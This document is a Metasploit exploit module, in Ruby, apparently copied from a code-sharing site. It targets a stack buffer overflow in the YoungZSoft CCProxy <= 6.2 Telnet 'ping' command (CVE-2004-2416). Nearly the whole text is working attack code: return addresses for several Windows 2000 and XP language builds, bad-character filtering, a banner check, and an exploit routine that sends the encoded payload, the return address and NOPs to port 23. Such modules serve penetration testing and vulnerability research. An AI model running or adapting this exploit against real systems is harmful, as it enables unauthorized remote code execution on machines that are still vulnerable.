Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'		=> 'CCProxy Telnet Proxy Ping Overflow',
14
      'Description'	=> %q{
15
          This module exploits the YoungZSoft CCProxy <= v6.2 suite
16
        Telnet service. The stack is overwritten when sending an overly
17
        long address to the 'ping' command.
18
      },
19
      'Author' 	=> [ 'aushack' ],
20
      'Arch'		=> [ ARCH_X86 ],
21
      'License'       => MSF_LICENSE,
22
      'References'    =>
23
        [
24
          [ 'CVE', '2004-2416' ],
25
          [ 'OSVDB', '11593' ],
26
          [ 'BID', '11666' ],
27
          [ 'EDB', '621' ],
28
        ],
29
      'Privileged'		=> false,
30
      'DefaultOptions'	=>
31
        {
32
          'EXITFUNC' 	=> 'thread',
33
        },
34
      'Payload' =>
35
        {
36
          'Space'		=> 1012,
37
          'BadChars' 	=> "\x00\x07\x08\x0a\x0d\x20",
38
        },
39
      'Platform' => ['win'],
40
      'Targets' =>
41
        [
42
          # Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
43
          [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll
44
          [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll
45
          [ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll
46
          [ 'Windows XP SP0/1 - English',     { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll
47
          [ 'Windows XP SP2 - English',	    { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
48
        ],
49
      'DisclosureDate' => '2004-11-11'))
50

51
    register_options(
52
      [
53
        Opt::RPORT(23),
54
      ])
55
  end
56

57
  def check
58
    connect
59
    banner = sock.get_once || ''
60
    disconnect
61

62
    if banner.to_s =~ /CCProxy Telnet Service Ready/
63
      return Exploit::CheckCode::Detected
64
    end
65
      return Exploit::CheckCode::Safe
66
  end
67

68
  def exploit
69
    connect
70

71
    sploit  = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
72
    sock.put(sploit + "\r\n")
73

74
    handler
75
    disconnect
76
  end
77
end
78

79